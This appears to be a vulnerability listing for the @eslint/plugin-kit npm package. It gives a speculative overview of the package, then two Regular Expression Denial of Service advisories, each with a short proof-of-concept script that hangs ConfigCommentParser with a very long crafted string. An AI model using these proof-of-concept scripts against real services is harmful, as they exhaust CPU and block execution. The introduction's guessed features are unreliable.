The initial release of @eslint/plugin-kit, version 0.1.0, marks the debut of a tool designed to streamline ESLint plugin development. This package provides utilities intended to simplify common tasks encountered while building ESLint plugins, reducing boilerplate and improving maintainability. Key features likely focus on AST (Abstract Syntax Tree) traversal and manipulation, potentially offering enhanced node matching and code transformation capabilities. Developers can expect assistance with rule creation, testing methodologies, and documentation generation, resulting in a more efficient and consistent plugin development experience.
This initial version includes the "levn" dependency for parsing and validating configuration data, which suggests a focus on robust configuration handling within plugins. The development dependencies showcase a complete testing and build pipeline, demonstrating the maintainers' commitment to quality. C8 and Mocha are used for code coverage and testing, respectively, while Rollup bundles the library for distribution. TypeScript ensures type safety and improved developer experience. @eslint/core dependency indicates that the plugin kit is tightly coupled with the eslint core and offers utilities for that. With this initial version, plugin developers can establish a solid foundation for crafting ESLint plugins, improving code quality and enforcing coding standards within their projects. The Apache-2.0 license promotes open-source adoption. As the data for the previous version is missing, we can only infer that the differences lie in bug fixes, performance improvements or API changes.
All the vulnerabilities related to the version 0.1.0 of the package
Regular Expression Denial of Service (ReDoS) in @eslint/plugin-kit
Crafting a very large and well crafted string can increase the CPU usage and crash the program.
const { ConfigCommentParser } = require("@eslint/plugin-kit");
var str = "";
for (var i = 0; i < 1000000; i++) {
str += " ";
}
str += "A";
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseStringConfig(str, ""));
console.log("end")
// run `npm i @eslint/plugin-kit` and `node attack.js`
// then the program will stuck forever with high CPU usage
@eslint/plugin-kit is vulnerable to Regular Expression Denial of Service attacks through ConfigCommentParser
The ConfigCommentParser#parseJSONLikeConfig API is vulnerable to a Regular Expression Denial of Service (ReDoS) attack in its only argument.
The regular expression at packages/plugin-kit/src/config-comment-parser.js:158 is vulnerable to a quadratic runtime attack because the grouped expression is not anchored. This can be solved by prepending the regular expression with [^-a-zA-Z0-9/].
const { ConfigCommentParser } = require("@eslint/plugin-kit");
const str = `${"A".repeat(1000000)}?: 1 B: 2`;
console.log("start")
var parser = new ConfigCommentParser();
console.log(parser.parseJSONLikeConfig(str));
console.log("end")
// run `npm i @eslint/plugin-kit@0.3.3` and `node attack.js`
// then the program will stuck forever with high CPU usage
This is a Regular Expression Denial of Service attack which may lead to blocking execution and high CPU usage.